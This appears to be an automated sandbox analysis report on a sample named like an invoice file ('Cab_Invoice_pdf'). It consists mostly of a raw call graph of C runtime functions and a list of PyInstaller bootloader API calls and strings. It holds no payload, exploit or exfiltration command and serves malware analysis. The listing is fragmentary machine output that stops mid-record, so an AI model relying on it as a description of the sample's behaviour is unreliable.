18338 1311a82 18337->18338 18338->18303 18340 131a8d3 18339->18340 18341 131a8bb 18339->18341 18340->18341 18343 131a8db 18340->18343 18342 131c9ce __dosmaperr 20 API calls 18341->18342 18344 131a8c0 18342->18344 18356 131afae 18343->18356 18346 1321788 __cftof 26 API calls 18344->18346 18354 131a8cb 18346->18354 18348 131786a _ValidateLocalCookies 5 API calls 18350 13118b3 18348->18350 18350->18309 18354->18348 18357 131a8eb 18356->18357 18358 131afcb 18356->18358 18364 131af44 18357->18364 18358->18357 18359 1324425 pre_c_initialization 38 API calls 18358->18359 18360 131afec 18359->18360 18361 1324574 __fassign 38 API calls 18360->18361 18362 131b005 18361->18362 18384 13245a1 18362->18384 18365 131af63 18364->18365 18366 131c9ce __dosmaperr 20 API calls 18365->18366 18367 131a963 18366->18367 18368 131b242 18367->18368 18402 132151c 18368->18402 18370 131b267 18371 131c9ce __dosmaperr 20 API calls 18370->18371 18372 131b26c 18371->18372 18374 1321788 __cftof 26 API calls 18372->18374 18373 131a96e 18381 131b031 18373->18381 18374->18373 18375 131b252 18375->18370 18375->18373 18409 131b4f8 18375->18409 18417 131bd9e 18375->18417 18422 131b5dc 18375->18422 18427 131b62d 18375->18427 18456 131b912 18375->18456 18382 13209eb _free 20 API calls 18381->18382 18383 131b041 18382->18383 18383->18354 18385 13245b4 18384->18385 18386 13245c9 18384->18386 18385->18386 18388 1327996 18385->18388 18386->18357 18389 13279a2 ___scrt_is_nonwritable_in_current_image 18388->18389 18390 1324425 pre_c_initialization 38 API calls 18389->18390 18395 13279ac 18390->18395 18392 1327a30 ___scrt_is_nonwritable_in_current_image 18392->18386 18394 1320acd _abort 38 API calls 18394->18395 18395->18392 18395->18394 18396 13209eb _free 20 API calls 18395->18396 18397 1325ffe EnterCriticalSection 18395->18397 18398 1327a27 18395->18398 18396->18395 18397->18395 18401 1326046 LeaveCriticalSection 18398->18401 18400 1327a2e 18400->18395 18401->18400 18403 1321521 18402->18403 18404 1321534 
18402->18404 18405 131c9ce __dosmaperr 20 API calls 18403->18405 18404->18375 18406 1321526 18405->18406 18407 1321788 __cftof 26 API calls 18406->18407 18408 1321531 18407->18408 18408->18375 18478 131b536 18409->18478 18411 131b4fd 18412 131b514 18411->18412 18413 131c9ce __dosmaperr 20 API calls 18411->18413 18412->18375 18414 131b506 18413->18414 18415 1321788 __cftof 26 API calls 18414->18415 18416 131b511 18415->18416 18416->18375 18418 131bda4 18417->18418 18419 131bdae 18417->18419 18487 131b188 18418->18487 18419->18375 18423 131b5e2 18422->18423 18424 131b5ec 18422->18424 18425 131b188 42 API calls 18423->18425 18424->18375 18426 131b5eb 18425->18426 18426->18375 18428 131b634 18427->18428 18429 131b64e 18427->18429 18430 131b67e 18428->18430 18431 131b996 18428->18431 18432 131b92a 18428->18432 18429->18430 18433 131c9ce __dosmaperr 20 API calls 18429->18433 18430->18375 18434 131b96e 18431->18434 18436 131b99d 18431->18436 18437 131b9dc 18431->18437 18432->18434 18438 131b937 18432->18438 18435 131b66a 18433->18435 18453 131b953 18434->18453 18455 131b967 18434->18455 18526 131c30b 18434->18526 18439 1321788 __cftof 26 API calls 18435->18439 18441 131b9a2 18436->18441 18449 131b945 18436->18449 18540 131c4e8 18437->18540 18444 131b97d 18438->18444 18438->18449 18438->18453 18442 131b675 18439->18442 18441->18434 18445 131b9a7 18441->18445 18442->18375 18444->18455 18512 131c1e3 18444->18512 18447 131b9ba 18445->18447 18448 131b9ac 18445->18448 18520 131c455 18447->18520 18448->18455 18516 131c4c9 18448->18516 18449->18453 18449->18455 18532 131bf17 18449->18532 18453->18455 18543 131c6ae 18453->18543 18455->18375 18457 131b996 18456->18457 18458 131b92a 18456->18458 18459 131b99d 18457->18459 18460 131b9dc 18457->18460 18466 131b96e 18457->18466 18458->18466 18468 131b937 18458->18468 18461 131b945 18459->18461 18462 131b9a2 18459->18462 18463 131c4e8 26 API calls 18460->18463 18464 131bf17 48 API calls 18461->18464 18476 131b953 18461->18476 18477 
131b967 18461->18477 18465 131b9a7 18462->18465 18462->18466 18463->18476 18464->18476 18470 131b9ba 18465->18470 18471 131b9ac 18465->18471 18469 131c30b 26 API calls 18466->18469 18466->18476 18466->18477 18467 131b97d 18473 131c1e3 40 API calls 18467->18473 18467->18477 18468->18461 18468->18467 18468->18476 18469->18476 18472 131c455 26 API calls 18470->18472 18474 131c4c9 26 API calls 18471->18474 18471->18477 18472->18476 18473->18476 18474->18476 18475 131c6ae 40 API calls 18475->18477 18476->18475 18476->18477 18477->18375 18481 131b57b 18478->18481 18480 131b542 18480->18411 18482 131b5d1 18481->18482 18483 131b59d 18481->18483 18482->18480 18483->18482 18484 131c9ce __dosmaperr 20 API calls 18483->18484 18485 131b5c6 18484->18485 18486 1321788 __cftof 26 API calls 18485->18486 18486->18482 18490 1323e09 18487->18490 18491 1323e24 18490->18491 18494 1320bbb 18491->18494 18495 132151c 26 API calls 18494->18495 18499 1320bcd 18495->18499 18496 1320c08 18497 131afae __fassign 38 API calls 18496->18497 18504 1320c14 18497->18504 18498 1320be2 18500 131c9ce __dosmaperr 20 API calls 18498->18500 18499->18496 18499->18498 18511 131b1af 18499->18511 18501 1320be7 18500->18501 18502 1321788 __cftof 26 API calls 18501->18502 18502->18511 18503 1321561 42 API calls 18503->18504 18504->18503 18505 1320c43 18504->18505 18507 13214c8 26 API calls 18505->18507 18508 1320caf 18505->18508 18506 13214c8 26 API calls 18509 1320d76 18506->18509 18507->18508 18508->18506 18510 131c9ce __dosmaperr 20 API calls 18509->18510 18509->18511 18510->18511 18511->18375 18514 131c1fb 18512->18514 18513 131c230 18513->18453 18514->18513 18549 1324096 18514->18549 18517 131c4d5 18516->18517 18518 131c30b 26 API calls 18517->18518 18519 131c4e7 18518->18519 18519->18453 18522 131c46a 18520->18522 18521 131c9ce __dosmaperr 20 API calls 18523 131c473 18521->18523 18522->18521 18525 131c47e 18522->18525 18524 1321788 __cftof 26 API calls 18523->18524 18524->18525 18525->18453 18527 131c31c 
18526->18527 18528 131c9ce __dosmaperr 20 API calls 18527->18528 18531 131c346 18527->18531 18529 131c33b 18528->18529 18530 1321788 __cftof 26 API calls 18529->18530 18530->18531 18531->18453 18533 131bf2d 18532->18533 18571 131abac 18533->18571 18535 131bf74 18581 1324e99 18535->18581 18539 131c00d 18539->18453 18541 131c30b 26 API calls 18540->18541 18542 131c4ff 18541->18542 18542->18453 18547 131c720 18543->18547 18548 131c6cb 18543->18548 18544 131786a _ValidateLocalCookies 5 API calls 18546 131c74f 18544->18546 18545 1324096 __cftof 40 API calls 18545->18548 18546->18455 18547->18544 18548->18545 18548->18547 18552 1323f75 18549->18552 18553 1323f89 18552->18553 18554 1323fae 18553->18554 18555 1323fbf 18553->18555 18565 1323f8d 18553->18565 18556 131c9ce __dosmaperr 20 API calls 18554->18556 18557 131afae __fassign 38 API calls 18555->18557 18558 1323fb3 18556->18558 18559 1323fca 18557->18559 18560 1321788 __cftof 26 API calls 18558->18560 18561 1323fd7 18559->18561 18562 1324034 WideCharToMultiByte 18559->18562 18560->18565 18564 1323fe5 ___scrt_fastfail 18561->18564 18566 132401b ___scrt_fastfail 18561->18566 18563 1324064 GetLastError 18562->18563 18562->18564 18563->18564 18563->18566 18564->18565 18567 131c9ce __dosmaperr 20 API calls 18564->18567 18565->18513 18566->18565 18568 131c9ce __dosmaperr 20 API calls 18566->18568 18567->18565 18569 1324087 18568->18569 18570 1321788 __cftof 26 API calls 18569->18570 18570->18565 18572 131abd7 18571->18572 18573 131abc8 18571->18573 18575 131abcd 18572->18575 18576 1320a25 __fread_nolock 21 API calls 18572->18576 18574 131c9ce __dosmaperr 20 API calls 18573->18574 18574->18575 18575->18535 18577 131abfe 18576->18577 18578 131ac15 18577->18578 18613 131b04b 18577->18613 18580 13209eb _free 20 API calls 18578->18580 18580->18575 18582 1324ea9 18581->18582 18587 1324ebf 18581->18587 18583 131c9ce __dosmaperr 20 API calls 18582->18583 18586 1324eae 18583->18586 18584 1324ed3 18585 131c9ce __dosmaperr 20 API 
calls 18584->18585 18588 1324ed8 18585->18588 18589 1321788 __cftof 26 API calls 18586->18589 18587->18584 18591 1324ee9 18587->18591 18590 1321788 __cftof 26 API calls 18588->18590 18603 131bfee 18589->18603 18590->18603 18593 1324f45 18591->18593 18594 1324f23 18591->18594 18592 1324f63 18597 1324fc2 18592->18597 18598 1324f8c 18592->18598 18593->18592 18595 1324f68 18593->18595 18616 1324d6d 18594->18616 18626 1324658 18595->18626 18654 132495b 18597->18654 18599 1324f91 18598->18599 18600 1324faa 18598->18600 18637 1324ca5 18599->18637 18647 1324b41 18600->18647 18603->18539 18606 131b12c 18603->18606 18661 1323dd9 18606->18661 18608 131b13e 18614 13209eb _free 20 API calls 18613->18614 18615 131b05a 18614->18615 18615->18578 18617 1324d93 18616->18617 18618 1324da8 18616->18618 18619 131786a _ValidateLocalCookies 5 API calls 18617->18619 18618->18618 18621 1320a73 26 API calls 18618->18621 18620 1324da4 18619->18620 18620->18603 18622 1324e4b 18621->18622 18622->18617 18623 1324e58 18622->18623 18624 1321798 __cftof 11 API calls 18623->18624 18627 132466c 18626->18627 18628 131afae __fassign 38 API calls 18627->18628 18629 132467e 18628->18629 18630 1324686 18629->18630 18631 132469a 18629->18631 18638 132974e 28 API calls 18637->18638 18639 1324cd3 18638->18639 18648 132974e 28 API calls 18647->18648 18649 1324b6e 18648->18649 18655 132974e 28 API calls 18654->18655 18656 1324983 18655->18656 18657 13291b9 26 API calls 18656->18657 18662 1323df1 18661->18662 18663 1323de7 18661->18663 18662->18608 18664 1323dbf 46 API calls 18663->18664 18664->18662 18671 1314cf8 18670->18671 18672 1314c9a WideCharToMultiByte 18670->18672 18673 1314cfc WideCharToMultiByte 18671->18673 18674 1314cb6 18672->18674 18678 1314ccd 18672->18678 18675 1314d30 18673->18675 18676 1314d19 18673->18676 18677 1311860 57 API calls 18674->18677 18675->18318 18679 1311860 57 API calls 18676->18679 18680 1314cc5 18677->18680 18678->18673 18681 1314ce1 18678->18681 18682 1314d28 18679->18682 
18680->18318 18683 1311860 57 API calls 18681->18683 18682->18318 18684 1314cf0 18683->18684 18684->18318 18688 131d57a ___scrt_is_nonwritable_in_current_image 18685->18688 18686 131d588 18687 131c9ce __dosmaperr 20 API calls 18686->18687 18689 131d58d 18687->18689 18688->18686 18690 131d5b8 18688->18690 18691 1321788 __cftof 26 API calls 18689->18691 18692 131d5ca 18690->18692 18693 131d5bd 18690->18693 18700 131d598 ___scrt_is_nonwritable_in_current_image 18691->18700 18702 1321990 18692->18702 18694 131c9ce __dosmaperr 20 API calls 18693->18694 18694->18700 18696 131d5d3 18697 131d5e6 18696->18697 18698 131d5d9 18696->18698 18710 131d618 18697->18710 18699 131c9ce __dosmaperr 20 API calls 18698->18699 18699->18700 18700->18293 18703 132199c ___scrt_is_nonwritable_in_current_image 18702->18703 18714 1325ffe EnterCriticalSection 18703->18714 18705 13219aa 18715 1321a2a 18705->18715 18709 13219db ___scrt_is_nonwritable_in_current_image 18709->18696 18711 131d61c 18710->18711 18742 131a85b LeaveCriticalSection 18711->18742 18713 131d62d 18713->18700 18714->18705 18716 1321a4d 18715->18716 18717 1321aa6 18716->18717 18724 13219b7 18716->18724 18731 131a847 EnterCriticalSection 18716->18731 18732 131a85b LeaveCriticalSection 18716->18732 18718 1320b10 _abort 20 API calls 18717->18718 18719 1321aaf 18718->18719 18721 13209eb _free 20 API calls 18719->18721 18722 1321ab8 18721->18722 18722->18724 18733 132391e 18722->18733 18728 13219e6 18724->18728 18741 1326046 LeaveCriticalSection 18728->18741 18730 13219ed 18730->18709 18731->18716 18732->18716 18734 1323587 _abort 5 API calls 18733->18734 18735 1323945 18734->18735 18736 1323963 InitializeCriticalSectionAndSpinCount 18735->18736 18737 132394e 18735->18737 18736->18737 18738 131786a _ValidateLocalCookies 5 API calls 18737->18738 18739 1321ad7 18738->18739 18740 131a847 EnterCriticalSection 18739->18740 18740->18724 18741->18730 18742->18713 18748 131c9e1 18743->18748 18744 13244a9 _abort 20 API calls 18744->18748 
18745 1320b10 _abort 20 API calls 18745->18748 18747 13209eb _free 20 API calls 18747->18748 18748->18743 18748->18744 18748->18745 18748->18747 18749 1311806 18748->18749 18750 1321798 __cftof 11 API calls 18748->18750 18751 13250a9 18748->18751 18749->17765 18750->18748 18753 1324ff8 18751->18753 18752 132500d 18754 131c9ce __dosmaperr 20 API calls 18752->18754 18755 1325012 18752->18755 18753->18752 18753->18755 18758 1325049 18753->18758 18756 1325038 18754->18756 18755->18748 18757 1321788 __cftof 26 API calls 18756->18757 18757->18755 18758->18755 18759 131c9ce __dosmaperr 20 API calls 18758->18759 18759->18756 18760 1314860 18761 131486a __wsopen_s 18760->18761 18762 1314883 GetLastError 18761->18762 18763 1314889 FormatMessageW 18761->18763 18762->18763 18764 13148d8 18763->18764 18765 13148ac 18763->18765 18767 1314c90 57 API calls 18764->18767 18766 1311860 57 API calls 18765->18766 18768 13148bb 18766->18768 18769 13148ec 18767->18769 18770 131786a _ValidateLocalCookies 5 API calls 18768->18770 18771 131786a _ValidateLocalCookies 5 API calls 18769->18771 18772 13148d1 18770->18772 18773 131490e 18771->18773 19153 131796b 19154 1317977 ___scrt_is_nonwritable_in_current_image 19153->19154 19178 1317e02 19154->19178 19156 131797e 19158 13179a7 19156->19158 19203 1318111 IsProcessorFeaturePresent 19156->19203 19166 13179e6 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 19158->19166 19189 131ffe7 19158->19189 19162 13179c6 ___scrt_is_nonwritable_in_current_image 19163 1317a46 19193 131822c 19163->19193 19165 1317a4c 19197 1311000 19165->19197 19166->19163 19211 132028a 19166->19211 19179 1317e0b 19178->19179 19231 131836b IsProcessorFeaturePresent 19179->19231 19183 1317e20 19183->19156 19184 1317e1c 19184->19183 19242 13208aa 19184->19242 19187 1317e37 19187->19156 19192 131fffe 19189->19192 19190 131786a _ValidateLocalCookies 5 API calls 19191 13179c0 19190->19191 19191->19162 19207 131ff8b 19191->19207 19192->19190 19364 1318520 
19193->19364 19195 131823f GetStartupInfoW 19196 1318252 19195->19196 19196->19165 19198 1311006 19197->19198 19366 1314a10 19198->19366 19200 1311016 19374 1312450 19200->19374 19204 1318127 ___scrt_fastfail 19203->19204 19205 13181cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19204->19205 19206 1318219 19205->19206 19206->19156 19208 131ffba 19207->19208 19209 131786a _ValidateLocalCookies 5 API calls 19208->19209 19210 131ffe3 19209->19210 19210->19166 19212 13202b2 pre_c_initialization _abort 19211->19212 19212->19163 19213 1324425 pre_c_initialization 38 API calls 19212->19213 19214 132093e 19213->19214 19215 1320acd _abort 38 API calls 19214->19215 19216 1320968 19215->19216 19232 1317e17 19231->19232 19233 13190d6 19232->19233 19234 13190db ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 19233->19234 19253 13192e8 19234->19253 19237 13190e9 19237->19184 19239 13190f1 19240 13190fc 19239->19240 19267 1319324 19239->19267 19240->19184 19308 13285a2 19242->19308 19245 13190ff 19246 1319108 19245->19246 19247 1319119 19245->19247 19248 13192cd ___vcrt_uninitialize_ptd 6 API calls 19246->19248 19247->19183 19249 131910d 19248->19249 19250 1319324 ___vcrt_uninitialize_locks DeleteCriticalSection 19249->19250 19251 1319112 19250->19251 19360 13195c2 19251->19360 19254 13192f1 19253->19254 19256 131931a 19254->19256 19257 13190e5 19254->19257 19271 1319542 19254->19271 19258 1319324 ___vcrt_uninitialize_locks DeleteCriticalSection 19256->19258 19257->19237 19259 131929a 19257->19259 19258->19257 19289 1319491 19259->19289 19261 13192a4 19266 13192af 19261->19266 19294 1319505 19261->19294 19263 13192bd 19264 13192ca 19263->19264 19299 13192cd 19263->19299 19264->19239 19266->19239 19268 131934e 19267->19268 19269 131932f 19267->19269 19268->19237 19270 1319339 DeleteCriticalSection 19269->19270 19270->19268 19270->19270 19276 1319370 19271->19276 19273 131955c 19274 1319579 
InitializeCriticalSectionAndSpinCount 19273->19274 19275 1319565 19273->19275 19274->19275 19275->19254 19279 13193a0 19276->19279 19281 13193a4 __crt_fast_encode_pointer 19276->19281 19277 13193c4 19280 13193d0 GetProcAddress 19277->19280 19277->19281 19279->19277 19279->19281 19282 1319410 19279->19282 19280->19281 19281->19273 19283 1319438 LoadLibraryExW 19282->19283 19288 131942d 19282->19288 19284 1319454 GetLastError 19283->19284 19285 131946c 19283->19285 19284->19285 19286 131945f LoadLibraryExW 19284->19286 19287 1319483 FreeLibrary 19285->19287 19285->19288 19286->19285 19287->19288 19288->19279 19290 1319370 try_get_function 5 API calls 19289->19290 19291 13194ab 19290->19291 19292 13194c3 TlsAlloc 19291->19292 19293 13194b4 19291->19293 19293->19261 19295 1319370 try_get_function 5 API calls 19294->19295 19296 131951f 19295->19296 19297 1319539 TlsSetValue 19296->19297 19298 131952e 19296->19298 19297->19298 19298->19263 19300 13192dd 19299->19300 19301 13192d7 19299->19301 19300->19266 19303 13194cb 19301->19303 19304 1319370 try_get_function 5 API calls 19303->19304 19305 13194e5 19304->19305 19306 13194fc TlsFree 19305->19306 19307 13194f1 19305->19307 19306->19307 19307->19300 19311 13285bf 19308->19311 19312 13285bb 19308->19312 19309 131786a _ValidateLocalCookies 5 API calls 19310 1317e29 19309->19310 19310->19187 19310->19245 19311->19312 19314 132298e 19311->19314 19312->19309 19315 132299a ___scrt_is_nonwritable_in_current_image 19314->19315 19326 1325ffe EnterCriticalSection 19315->19326 19317 13229a1 19327 131e611 19317->19327 19319 13229b0 19320 13229bf 19319->19320 19340 1322822 GetStartupInfoW 19319->19340 19351 13229db 19320->19351 19323 13229d0 ___scrt_is_nonwritable_in_current_image 19323->19311 19326->19317 19328 131e61d ___scrt_is_nonwritable_in_current_image 19327->19328 19329 131e641 19328->19329 19330 131e62a 19328->19330 19354 1325ffe EnterCriticalSection 19329->19354 19332 131c9ce __dosmaperr 20 API calls 19330->19332 19333 
131e62f 19332->19333 19334 1321788 __cftof 26 API calls 19333->19334 19336 131e639 ___scrt_is_nonwritable_in_current_image 19334->19336 19335 131e679 19355 131e6a0 19335->19355 19336->19319 19338 131e562 __wsopen_s 21 API calls 19339 131e64d 19338->19339 19339->19335 19339->19338 19341 13228d1 19340->19341 19342 132283f 19340->19342 19346 13228d8 19341->19346 19342->19341 19343 131e611 27 API calls 19342->19343 19344 1322868 19343->19344 19344->19341 19345 1322896 GetFileType 19344->19345 19345->19344 19347 13228df 19346->19347 19348 1322922 GetStdHandle 19347->19348 19349 132298a 19347->19349 19350 1322935 GetFileType 19347->19350 19348->19347 19349->19320 19350->19347 19359 1326046 LeaveCriticalSection 19351->19359 19353 13229e2 19353->19323 19354->19339 19358 1326046 LeaveCriticalSection 19355->19358 19357 131e6a7 19357->19336 19358->19357 19359->19353 19361 13195f1 19360->19361 19362 13195cb 19360->19362 19361->19247 19362->19361 19363 13195db FreeLibrary 19362->19363 19363->19362 19365 1318537 19364->19365 19365->19195 19365->19365 19367 1314a24 19366->19367 19368 1314a2d 19367->19368 19369 1314a50 WideCharToMultiByte 19367->19369 19370 1314ac0 19367->19370 19372 1314a8b WideCharToMultiByte 19367->19372 19368->19200 19369->19367 19369->19370 19371 1311860 59 API calls 19370->19371 19373 1314ae2 19371->19373 19372->19367 19372->19370 19373->19200 19375 131245a __wsopen_s 19374->19375 19432 131d2be 19375->19432 19433 131d2c9 19432->19433 19587 1325806 19433->19587 19436 1311770 19437 131177d 19436->19437 19588 1325818 19587->19588 19590 132582d 19587->19590 19589 131c9ce __dosmaperr 20 API calls 19588->19589 19591 132581d 19589->19591 19590->19588 19592 1325854 19590->19592 19593 1321788 __cftof 26 API calls 19591->19593 19596 1325711 19592->19596 19595 1312483 19593->19595 19595->19436 19599 13256c0 19596->19599 19600 13256cc ___scrt_is_nonwritable_in_current_image 19599->19600 19607 131a847 EnterCriticalSection 19600->19607 19602 13256da 19607->19602 21254 
131fa5b 21255 131fa64 21254->21255 21260 131fa7d 21254->21260 21256 131fa6c 21255->21256 21261 131fab9 21255->21261 21258 131fa74 21258->21256 21274 131fd60 21258->21274 21262 131fac2 21261->21262 21263 131fac5 21261->21263 21262->21258 21284 1327978 21263->21284 21268 131fad7 21270 13209eb _free 20 API calls 21268->21270 21271 131fb0c 21270->21271 21271->21258 21272 131fae2 21273 13209eb _free 20 API calls 21272->21273 21273->21268 21275 131fd6d 21274->21275 21281 131fd72 21274->21281 21275->21260 21276 131fd78 WideCharToMultiByte 21276->21281 21282 131fdcd 21276->21282 21277 1320b10 _abort 20 API calls 21277->21281 21278 131fdd3 21280 13209eb _free 20 API calls 21278->21280 21279 131fd9e WideCharToMultiByte 21279->21278 21279->21281 21280->21282 21281->21276 21281->21277 21281->21278 21281->21279 21281->21282 21283 13209eb _free 20 API calls 21281->21283 21282->21260 21283->21281 21285 1327981 21284->21285 21287 131facc 21284->21287 21317 1327877 21285->21317 21288 1327c60 GetEnvironmentStringsW 21287->21288 21289 1327c77 21288->21289 21299 1327cca 21288->21299 21292 1327c7d WideCharToMultiByte 21289->21292 21290 1327cd3 FreeEnvironmentStringsW 21291 131fad1 21290->21291 21291->21268 21300 131fb66 21291->21300 21293 1327c99 21292->21293 21292->21299 21294 1320a25 __fread_nolock 21 API calls 21293->21294 21295 1327c9f 21294->21295 21296 1327cbc 21295->21296 21297 1327ca6 WideCharToMultiByte 21295->21297 21298 13209eb _free 20 API calls 21296->21298 21297->21296 21298->21299 21299->21290 21299->21291 21301 131fb7b 21300->21301 21302 1320b10 _abort 20 API calls 21301->21302 21312 131fba2 21302->21312 21303 131fc06 21304 13209eb _free 20 API calls 21303->21304 21305 131fc20 21304->21305 21305->21272 21306 1320b10 _abort 20 API calls 21306->21312 21307 131fc08 21443 131fd31 21307->21443 21309 1320a73 26 API calls 21309->21312 21311 13209eb _free 20 API calls 21311->21303 21312->21303 21312->21306 21312->21307 21312->21309 21313 131fc2a 21312->21313 21315 13209eb _free 
20 API calls 21312->21315 21314 1321798 __cftof 11 API calls 21313->21314 21316 131fc36 21314->21316 21315->21312 21318 1324425 pre_c_initialization 38 API calls 21317->21318 21319 1327884 21318->21319 21320 1327996 __fassign 38 API calls 21319->21320 21321 132788c 21320->21321 21337 132760b 21321->21337 21324 13278a3 21324->21287 21325 1320a25 __fread_nolock 21 API calls 21326 13278b4 21325->21326 21327 13278e6 21326->21327 21344 1327a38 21326->21344 21330 13209eb _free 20 API calls 21327->21330 21330->21324 21331 13278e1 21332 131c9ce __dosmaperr 20 API calls 21331->21332 21332->21327 21333 132792a 21333->21327 21354 13274e1 21333->21354 21334 13278fe 21334->21333 21335 13209eb _free 20 API calls 21334->21335 21335->21333 21338 131afae __fassign 38 API calls 21337->21338 21339 132761d 21338->21339 21340 132763e 21339->21340 21341 132762c GetOEMCP 21339->21341 21342 1327643 GetACP 21340->21342 21343 1327655 21340->21343 21341->21343 21342->21343 21343->21324 21343->21325 21345 132760b 40 API calls 21344->21345 21346 1327a57 21345->21346 21349 1327aa8 IsValidCodePage 21346->21349 21351 1327a5e 21346->21351 21353 1327acd ___scrt_fastfail 21346->21353 21347 131786a _ValidateLocalCookies 5 API calls 21348 13278d9 21347->21348 21348->21331 21348->21334 21350 1327aba GetCPInfo 21349->21350 21349->21351 21350->21351 21350->21353 21351->21347 21357 13276e3 GetCPInfo 21353->21357 21421 132749e 21354->21421 21363 132771d 21357->21363 21366 13277c7 21357->21366 21360 131786a _ValidateLocalCookies 5 API calls 21362 1327873 21360->21362 21362->21351 21367 1328041 21363->21367 21365 132916e 43 API calls 21365->21366 21366->21360 21368 131afae __fassign 38 API calls 21367->21368 21369 1328061 MultiByteToWideChar 21368->21369 21371 132809f 21369->21371 21372 1328137 21369->21372 21374 1320a25 __fread_nolock 21 API calls 21371->21374 21377 13280c0 ___scrt_fastfail 21371->21377 21373 131786a _ValidateLocalCookies 5 API calls 21372->21373 21375 132777e 21373->21375 21374->21377 
21381 132916e 21375->21381 21376 1328131 21378 132815e __freea 20 API calls 21376->21378 21377->21376 21379 1328105 MultiByteToWideChar 21377->21379 21378->21372 21379->21376 21380 1328121 GetStringTypeW 21379->21380 21380->21376 21382 131afae __fassign 38 API calls 21381->21382 21383 1329181 21382->21383 21386 1328f51 21383->21386 21387 1328f6c 21386->21387 21388 1328f92 MultiByteToWideChar 21387->21388 21389 1329146 21388->21389 21390 1328fbc 21388->21390 21391 131786a _ValidateLocalCookies 5 API calls 21389->21391 21393 1320a25 __fread_nolock 21 API calls 21390->21393 21396 1328fdd 21390->21396 21392 132779f 21391->21392 21392->21365 21393->21396 21394 1329026 MultiByteToWideChar 21395 1329092 21394->21395 21397 132903f 21394->21397 21399 132815e __freea 20 API calls 21395->21399 21396->21394 21396->21395 21413 1323980 21397->21413 21399->21389 21414 1323587 _abort 5 API calls 21413->21414 21422 13274aa ___scrt_is_nonwritable_in_current_image 21421->21422 21429 1325ffe EnterCriticalSection 21422->21429 21424 13274b4 21430 1327509 21424->21430 21429->21424 21431 1319bdb __fread_nolock 26 API calls 21430->21431 21432 1327557 21431->21432 21433 1319bdb __fread_nolock 26 API calls 21432->21433 21434 1327573 21433->21434 21435 1319bdb __fread_nolock 26 API calls 21434->21435 21436 1327591 21435->21436 21437 13274c1 21436->21437 21438 13209eb _free 20 API calls 21436->21438 21439 13274d5 21437->21439 21438->21437 21442 1326046 LeaveCriticalSection 21439->21442 21441 13274df 21442->21441 21444 131fd3e 21443->21444 21448 131fc0e 21443->21448 21445 131fd55 21444->21445 21446 13209eb _free 20 API calls 21444->21446 21447 13209eb _free 20 API calls 21445->21447 21446->21444 21447->21448 21448->21311 19026 1326ba5 19027 1326bb1 ___scrt_is_nonwritable_in_current_image 19026->19027 19034 1325ffe EnterCriticalSection 19027->19034 19029 1326bbc 19035 1326bfa 19029->19035 19033 1326be6 ___scrt_is_nonwritable_in_current_image 19034->19029 19036 1326c09 19035->19036 19037 1326c1c 

                            Executed Functions

                            Control-flow Graph

                            APIs
                            • PyUnicode_Decode.PYTHON38(00003068,00003069,utf-8,strict,00000000,00000000,01312044,00000000,00000000,00000000,?,?,?,00000000), ref: 01313256
                            • PySys_SetObject.PYTHON38(_MEIPASS,00000000,?), ref: 0131327D
                            • PyImport_ImportModule.PYTHON38(marshal), ref: 01313288
                            • PyModule_GetDict.PYTHON38(00000000), ref: 0131328F
                            • PyDict_GetItemString.PYTHON38(00000000,loads), ref: 0131329B
                            • htonl.WS2_32(?), ref: 013132DC
                            • htonl.WS2_32(?), ref: 013132EA
                            • PyObject_CallFunction.PYTHON38(00000000,01331604,0000000C,-0000000C,?,?,00000000), ref: 013132FD
                            • PyImport_ExecCodeModule.PYTHON38(?,00000000), ref: 0131330F
                            • PyErr_Occurred.PYTHON38 ref: 0131332D
                            • PyErr_Print.PYTHON38 ref: 01313337
                            • PyErr_Clear.PYTHON38 ref: 0131333D
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Err_$Import_Modulehtonl$CallClearCodeDecodeDictDict_ExecFunctionImportItemModule_ObjectObject_OccurredPrintStringSys_Unicode_
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 3206803411-3336796446
                            • Opcode ID: 74c7c2ff91bf46968467128c39aa066c5e73737dac1ee2d2916ad24649f5298b
                            • Instruction ID: 379d61f6f502944b680c6947874db1f3651a7cbf25e4b9a7339b936b3acfa379
                            • Opcode Fuzzy Hash: 74c7c2ff91bf46968467128c39aa066c5e73737dac1ee2d2916ad24649f5298b
                            • Instruction Fuzzy Hash: F5312B72500201BBD7283B7DAC098A77B6CBF4133DF094516F906E224AEA21E515C7A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • PyImport_AddModule.PYTHON38(__main__,00000000,00000000,0131205E,00000000,?,?,00000000,00000000,?,?,?,00000000), ref: 01312239
                            • PyModule_GetDict.PYTHON38(00000000,?,?,?,00000000,00000000,?,?,?,00000000), ref: 01312272
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DictImport_ModuleModule_
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
